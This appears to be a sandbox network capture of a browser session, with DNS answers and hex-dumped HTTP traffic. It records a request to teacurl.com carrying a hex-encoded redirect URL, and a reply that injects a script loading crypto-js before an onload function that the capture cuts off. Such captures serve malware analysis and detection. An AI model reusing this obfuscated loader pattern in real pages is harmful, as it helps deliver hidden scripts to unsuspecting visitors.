Oct 30, 2024 16:05:59.197318077 CET	1.1.1.1	192.168.2.4	0xfbc7	No error (0)	s2.go-mpulse.net	ip46s2.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:59.197551966 CET	1.1.1.1	192.168.2.4	0xe020	No error (0)	s2.go-mpulse.net	ip46s2.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:05:59.219815969 CET	1.1.1.1	192.168.2.4	0x1dee	No error (0)	tag.getamigo.io		35.186.195.238	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:00.279133081 CET	1.1.1.1	192.168.2.4	0x5301	No error (0)	tag.getamigo.io		35.186.195.238	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:00.859888077 CET	1.1.1.1	192.168.2.4	0x2af1	No error (0)	c.go-mpulse.net	wildcard46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:00.860573053 CET	1.1.1.1	192.168.2.4	0xda8a	No error (0)	c.go-mpulse.net	wildcard46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:01.177845001 CET	1.1.1.1	192.168.2.4	0x1c19	No error (0)	s2.go-mpulse.net	ip46s2.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:01.180366039 CET	1.1.1.1	192.168.2.4	0xa6be	No error (0)	s2.go-mpulse.net	ip46s2.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:03.505848885 CET	1.1.1.1	192.168.2.4	0x9504	No error (0)	c.go-mpulse.net	wildcard46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:03.505944967 CET	1.1.1.1	192.168.2.4	0x6713	No error (0)	c.go-mpulse.net	wildcard46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:07.210984945 CET	1.1.1.1	192.168.2.4	0xcbc0	No error (0)	st.dynamicyield.com	d1nna0ec3lv40t.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:07.211919069 CET	1.1.1.1	192.168.2.4	0x23be	No error (0)	st.dynamicyield.com	d1nna0ec3lv40t.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:07.211919069 CET	1.1.1.1	192.168.2.4	0x23be	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.78	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:07.211919069 CET	1.1.1.1	192.168.2.4	0x23be	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.43	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:07.211919069 CET	1.1.1.1	192.168.2.4	0x23be	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.83	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:07.211919069 CET	1.1.1.1	192.168.2.4	0x23be	No error (0)	d1nna0ec3lv40t.cloudfront.net		18.66.122.33	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:07.318850994 CET	1.1.1.1	192.168.2.4	0x52b4	No error (0)	684dd32a.akstat.io	wildcard46.akstat.io.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:07.319219112 CET	1.1.1.1	192.168.2.4	0x1c	No error (0)	684dd32a.akstat.io	wildcard46.akstat.io.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:08.382169962 CET	1.1.1.1	192.168.2.4	0x91ac	No error (0)	async-px.dynamicyield.com		13.35.58.129	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.382169962 CET	1.1.1.1	192.168.2.4	0x91ac	No error (0)	async-px.dynamicyield.com		13.35.58.109	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.382169962 CET	1.1.1.1	192.168.2.4	0x91ac	No error (0)	async-px.dynamicyield.com		13.35.58.125	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.382169962 CET	1.1.1.1	192.168.2.4	0x91ac	No error (0)	async-px.dynamicyield.com		13.35.58.72	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.403971910 CET	1.1.1.1	192.168.2.4	0x5021	No error (0)	rcom.dynamicyield.com	d22rbd88eku03j.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:08.404581070 CET	1.1.1.1	192.168.2.4	0x5453	No error (0)	rcom.dynamicyield.com	d22rbd88eku03j.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:08.404581070 CET	1.1.1.1	192.168.2.4	0x5453	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.57	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.404581070 CET	1.1.1.1	192.168.2.4	0x5453	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.44	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.404581070 CET	1.1.1.1	192.168.2.4	0x5453	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.31	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:08.404581070 CET	1.1.1.1	192.168.2.4	0x5453	No error (0)	d22rbd88eku03j.cloudfront.net		18.245.86.58	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:18.827322006 CET	1.1.1.1	192.168.2.4	0x244a	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	azurefd-t-fb-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:18.827322006 CET	1.1.1.1	192.168.2.4	0x244a	No error (0)	dual.s-part-0017.t-0009.fb-t-msedge.net	s-part-0017.t-0009.fb-t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:18.827322006 CET	1.1.1.1	192.168.2.4	0x244a	No error (0)	s-part-0017.t-0009.fb-t-msedge.net		13.107.253.45	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:06:41.394619942 CET	1.1.1.1	192.168.2.4	0x3f5a	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:06:41.394619942 CET	1.1.1.1	192.168.2.4	0x3f5a	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:07:10.777215004 CET	1.1.1.1	192.168.2.4	0x9566	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:07:10.777215004 CET	1.1.1.1	192.168.2.4	0x9566	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 30, 2024 16:07:11.801631927 CET	1.1.1.1	192.168.2.4	0x6e55	No error (0)	www.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:07:11.803445101 CET	1.1.1.1	192.168.2.4	0xd095	No error (0)	www.kohls.com	prod-edge.kohls.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:07:54.895472050 CET	1.1.1.1	192.168.2.4	0x43a9	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 16:07:54.895472050 CET	1.1.1.1	192.168.2.4	0x43a9	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:28 UTC	656	OUT	GET /res444.php?2-68747470733a2f2f527042722e6974686265746f78692e636f6d2f7774716c6c48532f-peregrine HTTP/1.1 Host: teacurl.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:29 UTC	196	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:28 GMT Server: Apache Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: text/javascript;charset=UTF-8
2024-10-30 15:05:29 UTC	2003	IN	Data Raw: 37 63 37 0d 0a 20 20 20 20 76 61 72 20 53 50 47 72 5a 6e 64 56 6f 61 62 79 63 4c 43 4b 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 53 50 47 72 5a 6e 64 56 6f 61 62 79 63 4c 43 4b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 53 50 47 72 5a 6e 64 56 6f 61 62 79 63 4c 43 4b 29 3b 0d 0a 53 50 47 72 5a 6e 64 56 6f 61 62 79 63 4c 43 4b 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: 7c7 var SPGrZndVoabycLCK = document.createElement("script");SPGrZndVoabycLCK.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(SPGrZndVoabycLCK);SPGrZndVoabycLCK.onload=function()

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:29 UTC	526	OUT	GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:29 UTC	960	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:29 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e2d-bb78" Last-Modified: Mon, 04 May 2020 16:09:17 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 511219 Expires: Mon, 20 Oct 2025 15:05:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x4u6OM6tZqBqQZQro24YOzu3na7vh1Iu5olhdCFklq2XI48EiSp1q5FfzmV%2FFUVYWQSDTn%2BQJ3ZYOzlqzx7%2B5ohC2NRFd2ZJYdA13GpEUbPutSRwsp%2Bsby1y3VhnWA70v6hkeC1s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8dac4dc9bccce546-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:29 UTC	409	IN	Data Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f Data Ascii: t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeo
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 Data Ascii: =0;o<n;o++){var s=r[o>>>2]>>>24-o%48&255;e[i+o>>>2]\|=s<<24-(i+o)%48}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:func
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 Data Ascii: (t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?l.ceil(s):l.max((0\|s)-this._minBufferSize,0))o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProc
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 Data Ascii: ===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 Data Ascii: (e[4]>>>0<wt[4]>>>0?1:0)\|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)\|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)\|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((nn>>>17)+no>>>15)+oo,c=((4294901760&i)i\|0
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 Data Ascii: -o%42,a=s\|c;i[n>>>2]\|=a<<24-n%48,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429496
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 Data Ascii: A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38])
2024-10-30 15:05:29 UTC	1369	IN	Data Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c Data Ascii: one.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r\|~e&i)+n+s;return(c<<o\|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i\|r&~i)+n+s;return(c<<o\|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<
2024-10-30 15:05:30 UTC	1369	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 Data Ascii: function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0\|t))\|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:30 UTC	386	OUT	GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
